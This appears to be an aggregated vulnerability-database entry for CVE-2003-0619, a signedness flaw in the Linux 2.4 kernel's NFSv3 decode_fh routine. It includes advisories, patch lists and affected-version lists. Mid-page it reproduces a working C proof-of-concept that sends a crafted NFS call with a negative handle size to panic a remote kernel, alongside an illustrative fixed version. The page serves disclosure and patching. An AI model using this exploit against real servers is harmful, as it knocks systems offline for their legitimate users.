CVE-2003-0619
CVSS 5.0
Published: 2003-08-27 00:00:00
Last revised: 2016-10-17 22:35:54

[Original] Integer signedness error in the decode_fh function of nfs3xdr.c in Linux kernel before 2.4.21 allows remote attackers to cause a denial of service (kernel panic) via a negative size value within XDR data of an NFSv3 procedure call.


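[CNNVD] Linux Kernel 2.4 XDR Packet Handling NFSv3 Remote Denial of Service Vulnerability (CNNVD-200308-155)

        An integer signedness error exists in the decode_fh function of nfs3xdr.c in Linux kernel versions before 2.4.21. A remote attacker can cause a denial of service (kernel panic) via a negative value in the XDR data of an NFSv3 procedure call.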

- CVSS (Base Score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (Affected Platforms and Products)

Product and version information (CPE) is not currently available

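- OVAL (Technical Details for Detection)

oval:org.mitre.oval:def:386 Linux Kernel NFSv3 Procedure Kernel Panic Vulnerability
*OVAL describes in detail how to detect this vulnerability; more technical details on detecting it can be found in the related OVAL definition.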

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0619
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0619
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200308-155
(Official data source) CNNVD

- Other Links and Resources

http://marc.info/?l=bugtraq&m=105950927708272&w=2
(UNKNOWN)  BUGTRAQ  20030729 Remote Linux Kernel < 2.4.21 DoS in XDR routine.
http://www.debian.org/security/2004/dsa-358
(UNKNOWN)  DEBIAN  DSA-358
http://www.redhat.com/support/errata/RHSA-2003-198.html
(UNKNOWN)  REDHAT  RHSA-2003:198
http://www.redhat.com/support/errata/RHSA-2003-239.html
(UNKNOWN)  REDHAT  RHSA-2003:239

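- Vulnerability Information

Linux Kernel 2.4 XDR Packet Handling NFSv3 Remote Denial of Service Vulnerability
Medium severity  Boundary condition error
2003-08-27 00:00:00 2005-10-20 00:00:00
Remote
        An integer signedness error exists in the decode_fh function of nfs3xdr.c in Linux kernel versions before 2.4.21. A remote attacker can cause a denial of service (kernel panic) via a negative value in the XDR data of an NFSv3 procedure call.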

- Advisories and Patches

        SuSE has released advisory SUSE-SA:2004:035 mainly to address the vulnerability described in BID 11281. However, in the addendum of this advisory, it is reported that fixes for the issues described in this BID are now available on the SuSE update FTP server for download. Customers are advised to see the referenced advisory for further information regarding obtaining and applying appropriate updates.
        Debian has released advisory DSA 358-4 to address this issue.
        Red Hat has released an advisory (RHSA-2003:198-16) containing updated IA64 fixes for Red Hat Enterprise Linux AS (v. 2.1) and Red Hat Linux Advanced Workstation 2.1 for the Itanium Processor. These fixes are only available through the Red Hat Network, which can be found at http://rhn.redhat.com/.
        Red Hat has also released an advisory (RHSA-2003-239) containing kernel fixes for Red Hat Enterprise Linux AS, ES, and WS (v. 2.1). These fixes are also only available through the Red Hat Network, which can be found at http://rhn.redhat.com/.
        Red Hat security advisory RHSA-2003:172-27 has been released to address this and other issues. However, this advisory is superseded by RHBA-2003:263-05, which addresses unrelated bugs but provides kernel updates that include more recent fixes for this and other security vulnerabilities.
        Conectiva has released a security advisory (CLSA-2003:730) containing fixes to address this issue in CLEE 1.0. Users are advised to upgrade as soon as possible.
        Conectiva has released a security advisory (CLA-2003:796) containing fixes to address this issue in Conectiva Linux 8.
        SuSE has released advisory SUSE-SA:2004:028 along with fixes dealing with this issue. Please see the referenced advisory for more information.
        SuSE has released a second advisory dealing with this issue. Apparently the kernels shipped with SuSE Linux versions 8.1, 8.2, and 9.0 were not patched for this issue. Please see the referenced advisory for more information.
        RedHat kernel-2.4.18-3.i686.rpm
        
        RedHat kernel-2.4.2-2.i386.rpm
        
        RedHat kernel-source-2.4.18-14.i386.rpm
        
        RedHat kernel-bigmem-2.4.18-14.i686.rpm
        
        RedHat kernel-BOOT-2.4.7-10.i386.rpm
        
        RedHat kernel-doc-2.4.2-2.i386.rpm
        
        RedHat kernel-2.4.20-8.athlon.rpm
        
        RedHat kernel-source-2.4.2-2.i386.rpm
        
        RedHat kernel-2.4.7-10.athlon.rpm
        
        RedHat kernel-doc-2.4.18-3.i386.rpm
        
        RedHat kernel-BOOT-2.4.20-8.i386.rpm
        
        RedHat kernel-2.4.20-8.i586.rpm
        
        RedHat kernel-2.4.7-10.i686.rpm
        
        RedHat kernel-bigmem-2.4.20-8.i686.rpm
        
        RedHat kernel-source-2.4.20-8.i386.rpm
        
        RedHat kernel-2.4.20-8.i686.rpm
        
        RedHat kernel-BOOT-2.4.18-3.i386.rpm
        
        RedHat kernel-doc-2.4.18-14.i386.rpm
        
        RedHat kernel-BOOT-2.4.2-2.i386.rpm
        

- Vulnerability Information (68)

Linux Kernel <= 2.4.20 decode_fh Denial of Service Exploit (EDBID:68)
linux dos
2003-07-29 Verified
0 Jared Stanbrough
N/A
/*
  Linux 2.4.20 knfsd kernel signed/unsigned decode_fh DoS
  Author: jared stanbrough <jareds pdx edu> 
  
  Vulnerable code: (fs/nfsd/nfs3xdr.c line 52-64)

  static inline u32 *
  decode_fh(u32 *p, struct svc_fh *fhp)
  {
        int size;
        fh_init(fhp, NFS3_FHSIZE);
        size = ntohl(*p++);
        if (size > NFS3_FHSIZE)
                return NULL;   

        memcpy(&fhp->fh_handle.fh_base, p, size);
        fhp->fh_handle.fh_size = size;
        return p + XDR_QUADLEN(size);
  }

  This code is called by quite a few XDR decoding routines. The below
  POC demonstrates the vulnerability by encoding a malicious fhsize
  at the beginning of a diroparg xdr argument. 
 
  To test this, the vulnerable host must have an accessible exported
  directory which was previously mounted by the attacker. _HOWEVER_ 
  it may be possible to trigger this bug by some other method.

  Fix: Simply change size to an unsigned int, or check for size < 0.
*/

#include <rpcsvc/nfs_prot.h>
#include <rpc/rpc.h>
#include <rpc/xdr.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>

#define NFSPROG 100003
#define NFSVERS 3
#define NFSPROC_GETATTR 1

static struct diropargs heh;

bool_t xdr_heh(XDR *xdrs, diropargs *heh) 
{
  int32_t werd = -1; 
  return xdr_int32_t(xdrs, &werd);
}

int main(void)
{
  CLIENT * client;
  struct timeval tv;

  client = clnt_create("marduk", NFSPROG, NFSVERS, "udp");
  
  if(client == NULL) {
      perror("clnt_create\n");
      return 1;  /* no client handle: stop instead of dereferencing NULL below */
  }

  tv.tv_sec = 3;
  tv.tv_usec = 0;
  client->cl_auth = authunix_create_default();

  clnt_call(client, NFSPROC_GETATTR, (xdrproc_t) xdr_heh, (char *)&heh,
            (xdrproc_t) xdr_void, NULL, tv);

  return 0;
}

// milw0rm.com [2003-07-29]
		

- Vulnerability Information

2353
Linux Kernel NFS XDR DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- Vulnerability Description

The Linux kernel contains a flaw that may allow a remote denial of service. The issue is that the "decode_fh" function in "nfs3xdr.c" fails to handle a negative size value in certain NFS calls, and will result in loss of availability for the platform.

- Timeline

2003-07-29 Unknown
2003-07-29 Unknown

- Solution

Upgrade to version 2.4.21 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Related References

- Vulnerability Author

- Vulnerability Information

Linux Kernel 2.4 XDR Packet Handler For NFSv3 Remote Denial Of Service Vulnerability
Boundary Condition Error 8298
Yes No
2003-07-29 12:00:00 2009-07-11 10:56:00
Discovery of this vulnerability has been credited to Jared Stanbrough <jareds@pdx.edu>.

- Affected Software Versions

SuSE SUSE Linux Enterprise Server 8
+ Linux kernel 2.4.21
+ Linux kernel 2.4.19
S.u.S.E. Novell Linux Desktop 1.0
S.u.S.E. Linux Personal 9.2
S.u.S.E. Linux Personal 9.1
S.u.S.E. Linux Personal 9.0
S.u.S.E. Linux Personal 8.2
S.u.S.E. Linux Enterprise Server 9
S.u.S.E. Linux Desktop 1.0
S.u.S.E. Linux 8.1
RedHat kernel-utils-2.4-8.29.i386.rpm
+ RedHat Linux 9.0 i386
RedHat kernel-utils-2.4-8.13.i386.rpm
+ RedHat Linux 8.0
RedHat kernel-utils-2.4-7.4.i386.rpm
+ RedHat Linux 7.3
RedHat kernel-uml-2.4.18-14.i686.rpm
+ RedHat Linux 8.0
RedHat kernel-source-2.4.7-10.i386.rpm
+ RedHat Linux 7.2
RedHat kernel-source-2.4.20-8.i386.rpm
+ RedHat Linux 9.0 i386
RedHat kernel-source-2.4.2-2.i386.rpm
+ RedHat Linux 7.1
RedHat kernel-source-2.4.18-3.i386.rpm
+ RedHat Linux 7.3
RedHat kernel-source-2.4.18-14.i386.rpm
+ RedHat Linux 8.0
RedHat kernel-smp-2.4.7-10.i686.rpm
+ RedHat Linux 7.2
RedHat kernel-smp-2.4.7-10.i586.rpm
+ RedHat Linux 7.2
RedHat kernel-smp-2.4.7-10.athlon.rpm
+ RedHat Linux 7.2
RedHat kernel-smp-2.4.20-8.i686.rpm
+ RedHat Linux 9.0 i386
RedHat kernel-smp-2.4.20-8.athlon.rpm
RedHat kernel-smp-2.4.2-2.i686.rpm
+ RedHat Linux 7.1
RedHat kernel-smp-2.4.2-2.i586.rpm
RedHat kernel-smp-2.4.18-3.i686.rpm
RedHat kernel-smp-2.4.18-3.i586.rpm
RedHat kernel-smp-2.4.18-3.athlon.rpm
+ RedHat Linux 7.3
RedHat kernel-smp-2.4.18-14.i686.rpm
RedHat kernel-smp-2.4.18-14.athlon.rpm
+ RedHat Linux 8.0
RedHat kernel-headers-2.4.7-10.i386.rpm
+ RedHat Linux 7.2
RedHat kernel-headers-2.4.2-2.i386.rpm
+ RedHat Linux 7.1
RedHat kernel-enterprise-2.4.2-2.i686.rpm
+ RedHat Linux 7.1
RedHat kernel-doc-2.4.7-10.i386.rpm
RedHat kernel-doc-2.4.20-8.i386.rpm
RedHat kernel-doc-2.4.2-2.i386.rpm
+ RedHat Linux 7.1
RedHat kernel-doc-2.4.18-3.i386.rpm
+ RedHat Linux 7.3
RedHat kernel-doc-2.4.18-14.i386.rpm
+ RedHat Linux 8.0
RedHat kernel-debug-2.4.18-3.i686.rpm
RedHat kernel-debug-2.4.18-14.i686.rpm
+ RedHat Linux 8.0
RedHat kernel-BOOT-2.4.7-10.i386.rpm
+ RedHat Linux 7.2
RedHat kernel-BOOT-2.4.20-8.i386.rpm
+ RedHat Linux 9.0 i386
RedHat kernel-BOOT-2.4.2-2.i386.rpm
+ RedHat Linux 7.1
RedHat kernel-BOOT-2.4.18-3.i386.rpm
+ RedHat Linux 7.3
RedHat kernel-BOOT-2.4.18-14.i386.rpm
RedHat kernel-bigmem-2.4.20-8.i686.rpm
+ RedHat Linux 9.0 i386
RedHat kernel-bigmem-2.4.18-3.i686.rpm
+ RedHat Linux 7.3
RedHat kernel-bigmem-2.4.18-14.i686.rpm
+ RedHat Linux 8.0
RedHat kernel-2.4.7-10.i686.rpm
+ RedHat Linux 7.2
RedHat kernel-2.4.7-10.i386.rpm
+ RedHat Linux 7.2
RedHat kernel-2.4.7-10.athlon.rpm
+ RedHat Linux 7.2
RedHat kernel-2.4.20-8.i686.rpm
+ RedHat Linux 9.0 i386
RedHat kernel-2.4.20-8.i586.rpm
+ RedHat Linux 9.0 i386
RedHat kernel-2.4.20-8.athlon.rpm
+ RedHat Linux 9.0 i386
RedHat kernel-2.4.2-2.i686.rpm
RedHat kernel-2.4.2-2.i586.rpm
RedHat kernel-2.4.2-2.i386.rpm
+ RedHat Linux 7.1
RedHat kernel-2.4.18-3.i686.rpm
+ RedHat Linux 7.3
RedHat kernel-2.4.18-3.i386.rpm
+ RedHat Linux 7.3
RedHat kernel-2.4.18-3.athlon.rpm
+ RedHat Linux 7.3
RedHat kernel-2.4.18-14.i686.rpm
+ RedHat Linux 8.0
RedHat kernel-2.4.18-14.i586.rpm
+ RedHat Linux 8.0
RedHat kernel-2.4.18-14.athlon.rpm
Linux kernel 2.4.21 pre4
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
Linux kernel 2.4.21 pre1
Linux kernel 2.4.21
+ Conectiva Linux 9.0
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
+ Red Hat Enterprise Linux AS 3
+ RedHat Desktop 3.0
+ RedHat Enterprise Linux ES 3
+ RedHat Enterprise Linux WS 3
+ S.u.S.E. Linux Personal 9.0 x86_64
+ S.u.S.E. Linux Personal 9.0
+ SuSE SUSE Linux Enterprise Server 8
Linux kernel 2.4.20
Linux kernel 2.4.19 -pre6
Linux kernel 2.4.19 -pre5
Linux kernel 2.4.19 -pre4
Linux kernel 2.4.19 -pre3
Linux kernel 2.4.19 -pre2
Linux kernel 2.4.19 -pre1
Linux kernel 2.4.19
+ Conectiva Linux 8.0
+ Conectiva Linux Enterprise Edition 1.0
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1
+ MandrakeSoft Multi Network Firewall 2.0
+ Mandriva Linux Mandrake 9.0
+ S.u.S.E. Linux 8.1
+ Slackware Linux -current
+ SuSE SUSE Linux Enterprise Server 8
+ SuSE SUSE Linux Enterprise Server 7
Linux kernel 2.4.18 pre-8
Linux kernel 2.4.18 pre-7
Linux kernel 2.4.18 pre-6
Linux kernel 2.4.18 pre-5
Linux kernel 2.4.18 pre-4
Linux kernel 2.4.18 pre-3
Linux kernel 2.4.18 pre-2
Linux kernel 2.4.18 pre-1
Linux kernel 2.4.18 x86
Linux kernel 2.4.18
+ Astaro Security Linux 2.0 23
+ Astaro Security Linux 2.0 16
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0
+ Red Hat Enterprise Linux AS 2.1 IA64
+ RedHat Advanced Workstation for the Itanium Processor 2.1 IA64
+ RedHat Advanced Workstation for the Itanium Processor 2.1
+ RedHat Linux 8.0
+ RedHat Linux 7.3
+ S.u.S.E. Linux 8.1
+ S.u.S.E. Linux 8.0
+ S.u.S.E. Linux 7.3
+ S.u.S.E. Linux 7.2
+ S.u.S.E. Linux 7.1
+ S.u.S.E. Linux Connectivity Server
+ S.u.S.E. Linux Database Server 0
+ S.u.S.E. Linux Firewall on CD
+ S.u.S.E. Linux Office Server
+ S.u.S.E. Linux Openexchange Server
+ S.u.S.E. Linux Personal 8.2
+ S.u.S.E. SuSE eMail Server 3.1
+ S.u.S.E. SuSE eMail Server III
+ SuSE SUSE Linux Enterprise Server 8
+ SuSE SUSE Linux Enterprise Server 7
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Workstation 8.0
+ Turbolinux Turbolinux Workstation 7.0
Linux kernel 2.4.17
Linux kernel 2.4.16
+ Sun Cobalt RaQ 550
Linux kernel 2.4.15
Linux kernel 2.4.14
Linux kernel 2.4.13
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Workstation 3.1.1
Linux kernel 2.4.12
+ Conectiva Linux 7.0
Linux kernel 2.4.11
Linux kernel 2.4.10
Linux kernel 2.4.9
+ Red Hat Enterprise Linux AS 2.1 IA64
+ Red Hat Enterprise Linux AS 2.1
+ RedHat Enterprise Linux ES 2.1 IA64
+ RedHat Enterprise Linux ES 2.1
+ RedHat Enterprise Linux WS 2.1 IA64
+ RedHat Enterprise Linux WS 2.1
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.2 alpha
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ Sun Linux 5.0.5
+ Sun Linux 5.0.3
+ Sun Linux 5.0
Linux kernel 2.4.8
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0
Linux kernel 2.4.7
+ RedHat Linux 7.2
+ S.u.S.E. Linux 7.2
+ S.u.S.E. Linux 7.1
Linux kernel 2.4.6
Linux kernel 2.4.5
+ Slackware Linux 8.0
Linux kernel 2.4.4
+ S.u.S.E. Linux 7.2
Linux kernel 2.4.3
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
Linux kernel 2.4.2
Linux kernel 2.4.1
Linux kernel 2.4.0-test9
Linux kernel 2.4.0-test8
Linux kernel 2.4.0-test7
Linux kernel 2.4.0-test6
Linux kernel 2.4.0-test5
Linux kernel 2.4.0-test4
Linux kernel 2.4.0-test3
Linux kernel 2.4.0-test2
Linux kernel 2.4.0-test12
Linux kernel 2.4.0-test11
Linux kernel 2.4.0-test10
Linux kernel 2.4.0-test1
Linux kernel 2.4

- Vulnerability Discussion

Linux Kernel 2.4 XDR handler routines for NFSv3 have been reported prone to a remote denial of service vulnerability.

The issue presents itself in the XDR handler routine contained in the nfs3xdr.c kernel source file. It is due to a signed/unsigned mismatch when processing the size field of an XDR packet.

A remote attacker may exploit this issue to trigger a kernel panic and deny service to legitimate users of the system.
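
The signed/unsigned mismatch described above, as an added example that is not part of the original advisory or of the kernel source: a user-space model of the length check in decode_fh next to a form that reads the length as unsigned. The names fh_model, signed_check_passes and decode_fh_checked, the words_left parameter and the sample buffers are assumptions made for illustration.

```c
#include <arpa/inet.h>   /* ntohl, htonl */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define NFS3_FHSIZE 64                      /* max NFSv3 file handle bytes */
#define XDR_QUADLEN(n) (((n) + 3) >> 2)     /* bytes -> 32-bit XDR words */

struct fh_model {                           /* hypothetical stand-in for struct svc_fh */
    uint32_t size;
    unsigned char data[NFS3_FHSIZE];
};

/* Original logic, modelled without the copy: returns 1 if the signed
 * comparison lets the length through, and reports the memcpy length. */
static int signed_check_passes(uint32_t wire, size_t *copy_len)
{
    int size = (int)ntohl(wire);            /* 0xffffffff becomes -1 */
    if (size > NFS3_FHSIZE)
        return 0;
    *copy_len = (size_t)size;               /* -1 converts to SIZE_MAX */
    return 1;
}

/* Hardened decode: unsigned length, plus a check against the words that
 * actually remain in the request buffer (extra hardening, an assumption). */
static const uint32_t *decode_fh_checked(const uint32_t *p, size_t words_left,
                                         struct fh_model *fhp)
{
    uint32_t size;
    if (words_left < 1)
        return NULL;
    size = ntohl(*p++);
    words_left--;
    if (size > NFS3_FHSIZE || XDR_QUADLEN(size) > words_left)
        return NULL;
    memcpy(fhp->data, p, size);
    fhp->size = size;
    return p + XDR_QUADLEN(size);
}

int main(void)
{
    /* Constructed sample inputs: a valid 8-byte handle and a length of -1. */
    uint32_t good[3] = { htonl(8), htonl(0x01020304), htonl(0x05060708) };
    uint32_t bad[1]  = { htonl(0xffffffffu) };
    struct fh_model fh;
    size_t len = 0;
    printf("signed check on -1 passes: %d (memcpy length %zu)\n",
           signed_check_passes(bad[0], &len), len);
    printf("hardened, good: %s\n", decode_fh_checked(good, 3, &fh) ? "ok" : "rejected");
    printf("hardened, bad:  %s\n", decode_fh_checked(bad, 1, &fh) ? "ok" : "rejected");
    return 0;
}
```
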

- Exploit

The following proof of concept has been supplied:

- Solution

SuSE has released advisory SUSE-SA:2004:035 mainly to address the vulnerability described in BID 11281. However, in the addendum of this advisory, it is reported that fixes for the issues described in this BID are now available on the SuSE update FTP server for download. Customers are advised to see the referenced advisory for further information regarding obtaining and applying appropriate updates.

Debian has released advisory DSA 358-4 to address this issue.

Red Hat has released an advisory (RHSA-2003:198-16) containing updated IA64 fixes for Red Hat Enterprise Linux AS (v. 2.1) and Red Hat Linux Advanced Workstation 2.1 for the Itanium Processor. These fixes are only available through the Red Hat Network which can be found at http://rhn.redhat.com/.

Red Hat has also released an advisory (RHSA-2003-239) containing kernel fixes for Red Hat Enterprise Linux AS, ES, and WS (v. 2.1). These fixes are also only available through the Red Hat Network, which can be found at http://rhn.redhat.com/.

Red Hat security advisory RHSA-2003:172-27 has been released to address this and other issues. However, this advisory is superseded by RHBA-2003:263-05, which addresses unrelated bugs but provides kernel updates that include more recent fixes for this and other security vulnerabilities.

Conectiva has released a security advisory (CLSA-2003:730) containing fixes to address this issue in CLEE 1.0. Users are advised to upgrade as soon as possible.

Conectiva has released a security advisory (CLA-2003:796) containing fixes to address this issue in Conectiva Linux 8.

SuSE has released advisory SUSE-SA:2004:028 along with fixes dealing with this issue. Please see the referenced advisory for more information.

SuSE has released a second advisory dealing with this issue. Apparently the kernels shipped with SuSE Linux versions 8.1, 8.2, and 9.0 were not patched for this issue. Please see the referenced advisory for more information.


RedHat kernel-2.4.18-3.i686.rpm

RedHat kernel-2.4.2-2.i386.rpm

RedHat kernel-source-2.4.18-14.i386.rpm

RedHat kernel-bigmem-2.4.18-14.i686.rpm

RedHat kernel-BOOT-2.4.7-10.i386.rpm

RedHat kernel-doc-2.4.2-2.i386.rpm

RedHat kernel-2.4.20-8.athlon.rpm

RedHat kernel-source-2.4.2-2.i386.rpm

RedHat kernel-2.4.7-10.athlon.rpm

RedHat kernel-doc-2.4.18-3.i386.rpm

RedHat kernel-BOOT-2.4.20-8.i386.rpm

RedHat kernel-2.4.20-8.i586.rpm

RedHat kernel-2.4.7-10.i686.rpm

RedHat kernel-bigmem-2.4.20-8.i686.rpm

RedHat kernel-source-2.4.20-8.i386.rpm

RedHat kernel-2.4.20-8.i686.rpm

RedHat kernel-BOOT-2.4.18-3.i386.rpm

RedHat kernel-doc-2.4.18-14.i386.rpm

RedHat kernel-BOOT-2.4.2-2.i386.rpm

RedHat kernel-2.4.7-10.i386.rpm

RedHat kernel-2.4.18-3.athlon.rpm

RedHat kernel-2.4.18-3.i386.rpm

RedHat kernel-bigmem-2.4.18-3.i686.rpm

RedHat kernel-source-2.4.7-10.i386.rpm

RedHat kernel-2.4.18-14.i586.rpm

RedHat kernel-2.4.18-14.i686.rpm

Linux kernel 2.4.18

Linux kernel 2.4.19

- Related References
